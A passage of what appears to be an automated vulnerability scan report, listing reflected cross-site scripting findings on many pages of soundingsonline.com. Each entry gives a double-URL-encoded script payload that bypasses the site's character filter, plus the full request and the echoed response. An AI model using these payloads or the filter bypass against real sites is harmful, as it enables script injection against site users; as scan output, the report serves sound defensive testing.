GET /boat-shop/on-powerboats?92b7d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee206520e3f2=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/on-powerboats?92b7d"><script>alert(1)</script>e206520e3f2=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1379. http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/on-sailboats

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 762e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef7a555db9a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 762e6"><script>alert(1)</script>f7a555db9a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /boat-shop/on-sailboats?762e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef7a555db9a8=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/on-sailboats?762e6"><script>alert(1)</script>f7a555db9a8=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1380. http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/q-a-a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99846%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1cbca046523 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99846"><script>alert(1)</script>1cbca046523 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /boat-shop/q-a-a?99846%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1cbca046523=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/q-a-a?99846"><script>alert(1)</script>1cbca046523=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1381. http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/sea-savvy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca2b2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7d3c3496f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ca2b2"><script>alert(1)</script>b7d3c3496f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /boat-shop/sea-savvy?ca2b2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7d3c3496f0=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/sea-savvy?ca2b2"><script>alert(1)</script>b7d3c3496f0=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1382. http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/tech-talk

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c19f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e422cb04ddca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c19f9"><script>alert(1)</script>422cb04ddca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /boat-shop/tech-talk?c19f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e422cb04ddca=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/tech-talk?c19f9"><script>alert(1)</script>422cb04ddca=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1383. http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/used-boat-review

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66f91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd21e5f0da1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66f91"><script>alert(1)</script>bd21e5f0da1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /boat-shop/used-boat-review?66f91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd21e5f0da1=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/used-boat-review?66f91"><script>alert(1)</script>bd21e5f0da1=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1384. http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/calendar

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4770b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8ef0412ef3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4770b"><script>alert(1)</script>a8ef0412ef3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /calendar?4770b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8ef0412ef3=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<a href="/calendar?4770b"><script>alert(1)</script>a8ef0412ef3=1&start=15" title="2">
...[SNIP]...

4.1385. http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/career-opportunities

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 122a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35521301fb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 122a9"><script>alert(1)</script>35521301fb8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /career-opportunities?122a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35521301fb8=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/career-opportunities?122a9"><script>alert(1)</script>35521301fb8=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1386. http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dda8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaa57a1f163c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2dda8"><script>alert(1)</script>aa57a1f163c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /columns-blogs?2dda8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaa57a1f163c=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs?2dda8"><script>alert(1)</script>aa57a1f163c=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1387. http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/bay-tripper

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8455b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e46cc250c867 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8455b"><script>alert(1)</script>46cc250c867 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /columns-blogs/bay-tripper?8455b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e46cc250c867=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs/bay-tripper?8455b"><script>alert(1)</script>46cc250c867=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1388. http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/books

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ec3c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0df49a7dd23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8ec3c"><script>alert(1)</script>0df49a7dd23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /columns-blogs/books?8ec3c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0df49a7dd23=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs/books?8ec3c"><script>alert(1)</script>0df49a7dd23=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1389. http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/new-england-fishing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc3b0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e96642237bfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dc3b0"><script>alert(1)</script>96642237bfb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /columns-blogs/new-england-fishing?dc3b0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e96642237bfb=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs/new-england-fishing?dc3b0"><script>alert(1)</script>96642237bfb=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1390. http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/under-way

Issue detail

